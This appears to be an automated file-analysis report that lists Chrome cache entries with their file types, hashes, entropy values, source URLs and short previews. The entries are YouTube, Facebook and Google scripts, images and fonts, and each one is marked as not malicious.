                                                                                                                                                                                  Preview:(function(g){var window=this;'use strict';var Prb=function(a,b){a.kb("onAutonavCoundownStarted",b)},l6=function(a,b,c){g.bv(a.element,"ytp-suggestion-set",!!b.videoId);.var d=b.playlistId;c=b.gh(c?c:"mqdefault.jpg");var e=null,f=null;b instanceof g.SS&&(b.lengthText?(e=b.lengthText||null,f=b.nw||null):b.lengthSeconds&&(e=g.eH(b.lengthSeconds),f=g.eH(b.lengthSeconds,!0)));var h=!!d;d=h&&"RD"===g.FRa(d).type;var l=b instanceof g.SS?b.isLivePlayback:null,m=b instanceof g.SS?b.isUpcoming:null,n=b.author,p=b.shortViewCount,q=b.publishedTimeText,r=[],t=[];n&&r.push(n);p&&(r.push(p),t.push(p));q&&t.push(q);c={title:b.title,author:n,author_and_views:r.join(" \u2022 "),aria_label:b.ariaLabel||.g.nK("Watch $TITLE",{TITLE:b.title}),duration:e,timestamp:f,url:b.Tk(),is_live:l,is_upcoming:m,is_list:h,is_mix:d,background:c?"background-image: url("+c+")":"",views_and_publish_time:t.join(" \u2022 "),autoplayAlternativeHeader:b.qs};b instanceof g.RS&&(c.playlist_length=b.playlistLength);a.update(c)},m6

                                                                                                                                                                                  Chrome Cache Entry: 888

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (7990)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):465346
                                                                                                                                                                                  Entropy (8bit):5.568829571605224
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:GQELY2kiAGRx0KDCJcrjrMwmvsPJ80cFcelRDKRsHu8aP9jpgc7S/i18EtJZGwSa:yK6elhkss9jOc7S618YZGxrpsU6Frb3r
                                                                                                                                                                                  MD5:19CDE8C7D278D8D2399B3082E08AB79F
                                                                                                                                                                                  SHA1:087AC4B875035E81E374F7A560935BFD1856D5DB
                                                                                                                                                                                  SHA-256:B405B1012AFB798C8242CC121DC2E228342E5803B5084C2B5BE42CF1AF85F735
                                                                                                                                                                                  SHA-512:1D5BC365F37041CBF159034EC292704986DB0288ED2B6CE836F706E0D92B899A101C155C8D3FFEE38722541ED3058591FBCE8189F54247C70E4CE07440DD471C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3ifrz4/yh/l/en_US/yLGZ8RCWXS5.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometBatchNotificationsStateChangeSubscription_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="6546596222061607"}),null);.__d("CometBatchNotificationsStateChangeSubscription.graphql",["CometBatchNotificationsStateChangeSubscription_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a=function(){var a={defaultValue:null,kind:"LocalArgument",name:"environment"},c={defaultValue:null,kind:"LocalArgument",name:"input"},d=[{alias:null,args:[{kind:"Variable",name:"data",variableName:"input"}],concreteType:"BatchNotificationStateChangeSubscribeResponsePayload",kind:"LinkedField",name:"batch_notification_state_change_subscribe",plural:!1,selections:[{alias:null,args:null,concreteType:"Notification",kind:"LinkedField",name:"aggregated_notifications",plural:!0,selections:[{alias:null,args:null,kind:"ScalarField",name:"id",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"seen_state",storageKey:null}],storageKey:null},{alias:null,args:nu

                                                                                                                                                                                  Chrome Cache Entry: 889

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2036)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):39877
                                                                                                                                                                                  Entropy (8bit):5.396884329936008
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:uwoR/ZrQgcREIb+9KiiqR12623vlpOeO/hpoLpRX:uz+gcRhQRIb9AP/hps
                                                                                                                                                                                  MD5:EB4FBC0E01EB4A539A6BC202AFD4C644
                                                                                                                                                                                  SHA1:1798B96F94E4461C211A1E5118994F6E0DFD53BE
                                                                                                                                                                                  SHA-256:ACAE96AA93E083C150D041E2F01185932E5AACD71E4B433CD165DD41AA97103A
                                                                                                                                                                                  SHA-512:B608780ED207A42DBE9DEEE88400A6D9462029A653CEC42323490B7023F210E99FB38BE5574A451F069EEB5A7F8125505989B331A2243C56D1F2C84A74A2B371
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/jsbin/spf.vflset/spf.js
                                                                                                                                                                                  Preview:(function(){function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof l&&l];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this);function ea(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.ea("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,g){this.g=f;ba(this,"description",{configurable:!0,writable:!0,value:g})}if(a)return a;c.protot

                                                                                                                                                                                  Chrome Cache Entry: 890

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 21 x 409, 8-bit colormap, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):2540
                                                                                                                                                                                  Entropy (8bit):7.241602582463701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:hjUR4TN+zzhq3Y40mP0VFx2teUFhZX3cUxadsKx6aBDLUSZ:V8cN93vQOeUFhZX3cJ/IaBDLzZ
                                                                                                                                                                                  MD5:617B29D87C8BE0A9E367320313656B2A
                                                                                                                                                                                  SHA1:46320109EDC1764CFBC60AD4F031E4018CF6ADEF
                                                                                                                                                                                  SHA-256:286E3110841E9FCE71D0E8CFCA1D1B7B0EDF781AF6D752ABF05F89AA6760EE79
                                                                                                                                                                                  SHA-512:42CEAF698DD7556BBA2BA11264B9923E66EBC514AF8554EBACF83391E7AA690E5DFAB2222872D40B61AE5FAF1500D22E6077808D0F5341088C70B36DEAA52C19
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/2UXBRrhCqJH.png
                                                                                                                                                                                  Preview:.PNG........IHDR.............Q......PLTEGpL.............................................................................................................................................................................................................................................................................................................................................................................................*m.5....tRNS.Z.$........>.........t@...\...V..J..D..*........X(.f......|"<d..`.PN.2.,....T.4H........p.~r..F LB0....b.&j8^6..hn.x.:Rlv.z=......IDATx^...S.I.../.......B.$."....`L..6`p.a.n..~..M......U.[E..T...*.~.....P.....O%.!...B...Ib......;.)..].!.....Z..:.[....S..!....[...Z....zh........g.....@.d..@......-.X......d3...fJ.q..R.Q...2X...ze.V...,....c..U.O.U.GW.[.......o(.,...j@.h~._....L.*.......K...ou..{...s..9..0.O.......LYM........[.+.....@..ldJD..G...W..+..........s.5.^..DCE....:...n...l..]E..).R.... 4hkH....x.V~S<2.I..[./..=...V#G....3D.NT..D.

                                                                                                                                                                                  Chrome Cache Entry: 891

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x960, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):50309
                                                                                                                                                                                  Entropy (8bit):7.953514743295348
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:qa9bRtAljRc8CzVNoNL8varrcWhJSXkJjQur0:NKcFzANxcx0hZ0
                                                                                                                                                                                  MD5:11F793077860FBFD4F3F363BDEFA4029
                                                                                                                                                                                  SHA1:0D9039180C53647608420BC576DDCF16761B968B
                                                                                                                                                                                  SHA-256:2B577D303AC60280016188BAC3A6312ABF2EC3056F5E38EFAAC77F1E53A31A51
                                                                                                                                                                                  SHA-512:DB77CB73507820A64CEC8D6B7C9F4FA0274CB169637FC297964441ADA58594ADB756A11C405F55E93A0EFD78AA55052099DDEA598330BA8A3BC75DDAB6979FA7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t51.29350-10/429002936_1427569127874570_76749294478997084_n.jpg?stp=dst-jpg_s960x960&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=9sRvTcw9bFQAX9mQrRD&_nc_ht=scontent-lga3-2.xx&oh=00_AfC0c9YNce-Nro59T3-4iGH_UC8t_AQvfwuP5OcmdFWdVw&oe=65DBAFC4
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a71010000e9170000653600000d3900001d3c000086570000cc7b0000fe810000658500000489000085c40000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".............................................................................................................................................................................................................................................................................................*Q.Q.8AN.S....8AN.S....8AN.S....8AN.S....8AN.S....8AN.S....8AN.S"......o>..c..jg.......M...................p..........c...=g?..z_=.........1.G_...._5.=.A.yi..<t;.o.z...}.........g..=..r|.#.....O.sZ..._...Q....\.9....=.G.xMy.....4.?s...K..}[.O+...../>.. .....i.y..V..Ol<.g...]..t..B.w..x'.r>.y..[.y.?W.r....oI..}?.....O*.w.<.W....Yy..}N..k}v..`z..y.W.y>....=?w../A.g.yO.yI.`..._e..y1..T(*P.B...*.A

                                                                                                                                                                                  Chrome Cache Entry: 892

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (533)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5547
                                                                                                                                                                                  Entropy (8bit):5.234104150395812
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:+E8YzVFXsVws8HYnkfI+C4yVdbaiGkNF2LSaAuEeRzgf5j6YJR79hamaWslv0Rw:+ajsVws8Hlzg2i/N9hzWgf5jhJR79haZ
                                                                                                                                                                                  MD5:936A7C8159737DF8DCE532F9EA4D38B4
                                                                                                                                                                                  SHA1:8834EA22EFF1BDFD35D2EF3F76D0E552E75E83C5
                                                                                                                                                                                  SHA-256:3EA95AF77E18116ED0E8B52BB2C0794D1259150671E02994AC2A8845BD1AD5B9
                                                                                                                                                                                  SHA-512:54471260A278D5E740782524392249427366C56B288C302C73D643A24C96D99A487507FBE1C47E050A52144713DFEB64CD37BC6359F443CE5F8FEB1A2856A70A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
                                                                                                                                                                                  Preview:/*.. Copyright 2016 Google Inc. All Rights Reserved... Licensed under the W3C SOFTWARE AND DOCUMENT NOTICE AND LICENSE... https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document..*/.(function(f,h){function t(a){this.time=a.time;this.target=a.target;this.rootBounds=a.rootBounds;this.boundingClientRect=a.boundingClientRect;this.intersectionRect=a.intersectionRect||q();this.isIntersecting=!!a.intersectionRect;a=this.boundingClientRect;a=a.width*a.height;var b=this.intersectionRect;b=b.width*b.height;this.intersectionRatio=a?b/a:this.isIntersecting?1:0}function d(a,b){b=b||{};if("function"!=typeof a)throw Error("callback must be a function");if(b.root&&1!=b.root.nodeType)throw Error("root must be an Element");.this.g=y(this.g.bind(this),this.B);this.D=a;this.h=[];this.i=[];this.s=this.L(b.rootMargin);this.thresholds=this.J(b.threshold);this.root=b.root||null;this.rootMargin=this.s.map(function(c){return c.value+c.unit}).join(" ")}function y(a,b){var c=null;return function

                                                                                                                                                                                  Chrome Cache Entry: 893

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x960, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):35166
                                                                                                                                                                                  Entropy (8bit):7.955833171657125
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:WSWZtAXVlOcjjjjjjnrlu7R/dJKpX3a7qr8d9rQaUyqdvjX7CsiHdJukc6cuc+Go:WSWZqPHKVJlrXVSL3jPM3R4vKfmx0
                                                                                                                                                                                  MD5:1FF9B8D91D58D7531FE96FF87F4B6458
                                                                                                                                                                                  SHA1:C94F0DD7E76C5FAF8591C84CE1B4016EE7AAF82D
                                                                                                                                                                                  SHA-256:4FBDF05A3E048876889B0B36BC0102FC5E85612F85CFF73871ED3DB6C9423DC8
                                                                                                                                                                                  SHA-512:59E26BFD1B44431D6EE959EC92220C37CC9E1D9F051090A276C3ED27ABE910EA3EA40D12880369793CB76E3C183E529FD65BECC938146C90A33C2EF9C3C2E72C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/426166576_399616406052465_4268749543528247153_n.jpg?stp=dst-jpg_s960x960&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=3JaVY4IWz3kAX8YNVSo&_nc_ht=scontent-lga3-2.xx&oh=00_AfAvWETlXrzDjzpb6cHsENE7Q-DSs9FbwQ3_JglkHMlPpQ&oe=65DB49AD
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a71010000061800003f2c0000a52e000022310000c83b0000005200003e580000d75b0000715f00005e890000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."................................................................................H..................................................................................................................................0C.0C.0C.0C.0C.0C.0C.0C.0C.0C.0C.0C.0C.0C.0C.0C...7..;>..<>..<>..<>...g...g.D...T|..#>t}._..Fg............'..'..'....p...A.7>..?.3...C...J...........P|..Y.4>..?.......:...../.Qg.O..$.... .....................3$.F@..!."I.e!.Lp.....6.9F.#8... ....4.B.......D........4....`.&...L...4Z...\...r....$q.NH..(......(.....C..@.0V...hW(...jW(.....b`.......L$.caR..@.. .. ..`...h. T.hp....10.@`.......$.. `.L`....T..4.......2DH"6.-.D..@0.P...H.........1.i..0!.....9E.i..6.0.P.......X

                                                                                                                                                                                  Chrome Cache Entry: 894

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                  Entropy (8bit):2.6465732373896285
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:Es5ed8vZa+/kffJTyN5J5iXSvjDxatgFFjiZq1MJUikeVgl2fwFfBaTzh4mpCbak:2fq3OqXAzh4jaJV9HxG8Q
                                                                                                                                                                                  MD5:3E764F0F737767B30A692FAB1DE3CE49
                                                                                                                                                                                  SHA1:58FA0755A8EE455819769EE0E77C23829BF488DD
                                                                                                                                                                                  SHA-256:88AE5454A7C32C630703440849D35C58F570D8EECC23C071DBE68D63CE6A40D7
                                                                                                                                                                                  SHA-512:2831536A2CA9A2562B7BE1053DF21C2ED51807C9D332878CF349DC0B718D09EEB587423B488C415672C89E42D98D9A9218FACE1FCF8E773492535CB5BD67E278
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/yT/r/aGT3gskzWBf.ico
                                                                                                                                                                                  Preview:............ .h...&... .... .........(....... ..... ..........................................h. .f...............f...g...d.@.........................`...e...f...f...............f...f...f...e...p...............`...f...f...f...f...............f...f...f...f...f...p...........e...f...f...f...f...............f...f...f...f...f...e.......d.@.f...f...f...f...f...............f...f...f...f...f...f...h. .e...f...f...f....U..........................y'..f...f...f...g...f...f...f...f...............................U..f...f...f...f...f...f...f...f..................................f...f...f...f...f...f...f...f...f...f...............f...f...f...f...f...f...f...f...f...f...f...f...f...............p...f...f...f...f...f...f...f...f...f...f...f...f...................d...U..f...f...f...e...h. .f...f...f...f...f....d......................f...f...f...h.@.....f...f...f...f...f...f....t.................f...f...f...........p...f...f...f...f...f...f...f...f...f...f...f...f...`...............p...f...f...f...f

                                                                                                                                                                                  Chrome Cache Entry: 895

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2360)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):216276
                                                                                                                                                                                  Entropy (8bit):5.455491059432931
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:E0nzyu8ItYoHFldaY4xzuQVLlGDPcHGcpP:lnCuYgTaY4/GqGQP
                                                                                                                                                                                  MD5:A1C97A27D5C64B97D4E96D5EACA3B8AA
                                                                                                                                                                                  SHA1:89C48372DBAD07D2EFE10475B14E6CDCA0BC2E80
                                                                                                                                                                                  SHA-256:C150006B9F983B4716C91B10C2E5888857F52E303BE151F27A9DF26FF2CE900B
                                                                                                                                                                                  SHA-512:7D18B750F8293E0606A43FC114D7E2AA0BD671C1A552F955A5A0137AB9F03ABD27AB03E3127E0E7BAE8B5947F301B5139FA0227DE8B6E2B8FB232A2679F5AD18
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/am=P2CJhmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlFU0Eb88gCMWemHf1wS2H0QUzNV-Q/m=_b,_tp"
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x689603f, 0x2040058e, 0x3f34e599, 0x30e4e33d, 0x0, 0x0, 0x3006b000, 0xe, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2013 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/.var baa,daa,Ra,haa,$a,cb,db,eb,fb,iaa,gb,lb,jaa,kaa,pb,naa,paa,Eb,qaa,taa,vaa,Aaa,Qb,Caa,Daa,Iaa,Oaa,Paa,Maa,Qaa,Vaa,Waa,Yaa,Zaa,$aa,aba,Lc,dba,cba,fba,Pc,Oc,hba,gba,kba,jba,Vc,nba,oba,dd,cd,Rc,zba,wba,Aba,Bba,Eba,Gba,Hba,uba,Qd,Rd,aca,je,cca,ke,dca,fca,hca,lca,mca,nca,oca,rca,tca,xca,yca,Cca,Mca,Ica,Oca,Qca,Rca,Uca,Wca,Zca,$ca,ada,bda,cda,fda,jf,gda,ida,lda,mda,aaa,nda,Af,oda,Cf,pda,qda,Ef,sda,Gf,zda,Dda,Cda,Of,Fda;_.aa=function(a){return fu

                                                                                                                                                                                  Chrome Cache Entry: 896

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15860, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15860
                                                                                                                                                                                  Entropy (8bit):7.988022700476719
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:S7qmPTF4N21t//YW2FS6+1XxrsbGmjlAbvqMmtCN:S621tHY4xwbGmjloSM7N
                                                                                                                                                                                  MD5:E9F5AAF547F165386CD313B995DDDD8E
                                                                                                                                                                                  SHA1:ACDEF5603C2387B0E5BFFD744B679A24A8BC1968
                                                                                                                                                                                  SHA-256:F5AEBDFEA35D1E7656EF4ACC5DB1F243209755AE3300943EF8FC6280F363C860
                                                                                                                                                                                  SHA-512:2A71EDB5490F286642A874D52A1969F54282BC43CB24E8D5A297E13B320321FB7B7AF5524EAC609CF5F95EE08D5E4EC5803E2A3C8D13C09F6CC38713C665D0CE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                                                                                                  Preview:wOF2......=...........=..........................d.....^.`.. .H..<........8........6.$.... ..~. ..)..~E......6..J..`.. :.....8.;..5......!.l.j.%SX.SDm...RXh...&.X......5..._...............@...8...Gi..g.;9..'.Q......1..5.U.....w.+.hn..........c.....5.#{..%.#.JP*..i.J..U(.6.D5V.<"Ex6"...k..[..{.?.d2....{.........*W.......S...hT,.l..'.9.;[@..._.L..|+...)......S...9F......T..t...-=X.:FtZ..uZ.[.?..f<.....@.....'...I...e..........8.?..-R.3,%X...I2|.Wk{i...V2C....H$.H.LH.{.........(...6U..%W[t.R....j.........iS..%..L....rf.=..7..9i.I...1.Mj..C..u.B.........vJ.....+.u$.=..3..T..R.._.gs...6).$.-.PUH..Hl....WDd.......fK.(B.F1>..5.._[..]}VA#X...c.....%.(s50...m...^...1...'.$U*H.t...H...s.AZu...'...8.p...@.@.....q..Y.#.....#.....G.....G@..o8. A........:.........S.:..N.S.j.....tav.}.9h..s.....he.......{,~k...,eK.z}.......5%G...l.uCK.....V..............m.....U}.Sz..Z.c.{.....:..g......>h..'|Z........a....^.b...o.>...g........f../w'....Ja.o(

                                                                                                                                                                                  Chrome Cache Entry: 897

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2360)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):216277
                                                                                                                                                                                  Entropy (8bit):5.455502756372822
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:j0nzyu8ItYoHFldaY4xzuQVLlGDPcHGcpP:QnCuYgTaY4/GqGQP
                                                                                                                                                                                  MD5:92BBD73283CCF052912D68922E212C38
                                                                                                                                                                                  SHA1:92F9A1D0628EE58A31E234953548FF16E3B390B4
                                                                                                                                                                                  SHA-256:BD33427A7076736CB9783D3E994B178A1882002E5B3F2D902D204A47A96AEA77
                                                                                                                                                                                  SHA-512:D854079F95E08F624D8B0E27732F54A8D17C33B0F3661E7D9370CEC5418605BBBCC689930462A261CD92570CE4F30CD8457A4CDA702C29B73DA05B00628FD0F3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/am=P2CJlmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlEEgWEfV3yt47xiVu7pvO4I3STIzw/m=_b,_tp"
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x1689603f, 0x2040058e, 0x3f34e599, 0x30e4e33d, 0x0, 0x0, 0x3006b000, 0xe, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2013 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/.var baa,daa,Ra,haa,$a,cb,db,eb,fb,iaa,gb,lb,jaa,kaa,pb,naa,paa,Eb,qaa,taa,vaa,Aaa,Qb,Caa,Daa,Iaa,Oaa,Paa,Maa,Qaa,Vaa,Waa,Yaa,Zaa,$aa,aba,Lc,dba,cba,fba,Pc,Oc,hba,gba,kba,jba,Vc,nba,oba,dd,cd,Rc,zba,wba,Aba,Bba,Eba,Gba,Hba,uba,Qd,Rd,aca,je,cca,ke,dca,fca,hca,lca,mca,nca,oca,rca,tca,xca,yca,Cca,Mca,Ica,Oca,Qca,Rca,Uca,Wca,Zca,$ca,ada,bda,cda,fda,jf,gda,ida,lda,mda,aaa,nda,Af,oda,Cf,pda,qda,Ef,sda,Gf,zda,Dda,Cda,Of,Fda;_.aa=function(a){return f

                                                                                                                                                                                  Chrome Cache Entry: 898

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15920, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15920
                                                                                                                                                                                  Entropy (8bit):7.987786667472439
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:sShqOXQlaSchOwK0uFvRqq3xR/xb5OY3aU/lHS9WE2YeK1os:sShJKaScJK0uFvRvxb5OY3aU/lHkmK
                                                                                                                                                                                  MD5:3A44E06EB954B96AA043227F3534189D
                                                                                                                                                                                  SHA1:23CEF6993DDB2B2979E8E7647FC3763694E2BA7D
                                                                                                                                                                                  SHA-256:B019538234514166EC7665359D097403358F8A4C991901983922FB4D56989F1E
                                                                                                                                                                                  SHA-512:FAB970B250DD88064730BD2603C530F3503ABB0AF4E4095786877F9660A159BF4AD98C5ABEA2E95EB39AE8C13417736B5772FCB9F87941FF5E0F383CB172997F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                  Preview:wOF2......>0.......T..=..........................d.....^.`.. .\..<.................6.$.... .... ..S.!.%c.......|y...6..;.s#.....x_<..o..........l...J.`p.m..6...h....U.pD...R.J.$...W..`7w...[..qD....<P......J.x.+J-^....va...:.KW..Ph...."....{.W4C....p..1..........CH.....P.............Q%.=.F.....1.%J....d..X..J.<AU..b.N...<l...d...f..^Y..]..&...VQ.<.....F..{.....&{.+J;.... .2P.:.*5..?.o.|....V[t..M..#..d.fv...........4..`.).h..h......@u........4......~.....r.B...p1.P.T..<....r....Y..8...GQ1.t.....%..-Wh..:W.....1l-...@..hL}...lN.._.j...D`..sn.=(...W..?.Z..p.52..H...X...)..CJ...V..*7.....<|..i...{...R.M+[..|..x-..M3...~!\.l6}.T.o.R'$.)..-.W.T....A...5?.{.2.bR.../....*l..;...{..I>.n..MJ.2........U&. ..(L]].%P.$..p59.LD.f.........V.....z.5~.2\......#.4....9_....%wp.OU.0.....CK..../.x. ..A2e...@...(.i..f./.....`1.......!......@....0 vbt.e v./!...N=>:..A...(...f....?.....iH.F..!k.6.O6S..54.^c..2.G.?6....)b......lv.,h....Y.}.?..uk....L.4d.g..6.\.1u..

                                                                                                                                                                                  Chrome Cache Entry: 899

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x960, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):82271
                                                                                                                                                                                  Entropy (8bit):7.982948558747172
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:YkomOkaydBbegkYZPfCnc0/67wLh8UUE2PvzqWrbGdCHzf3unRNjqIMRc5YWv6:umOk7dFPPqc0/fLhRTWrF30bIAy
                                                                                                                                                                                  MD5:072CE8B959DEFD50D4C28B815B27CFD6
                                                                                                                                                                                  SHA1:C829740BCB57849AA828A38C2CD7E03B0C4F1057
                                                                                                                                                                                  SHA-256:87EF90EAC25F046CE2DBC8CAC7076366EB8F108C06544DF003136A1EA8F2C02D
                                                                                                                                                                                  SHA-512:CFFF154D03089C83EA3C497B7F67A940A02101FE9067FF0F800694F85F8BCD9B0592BAA327177CE68568EBFDD84A5CA4DBAE266F50197D60823EB03A801F4D2E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/425986675_914058756846026_5537994848109864817_n.jpg?stp=dst-jpg_s960x960&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=cGExTFK4M7UAX_d0k50&_nc_ht=scontent-lga3-2.xx&oh=00_AfBuZRx5-uyxUDIsIQHFS_y8FgnWM11izqrh-zBHE6GmxA&oe=65DA6225
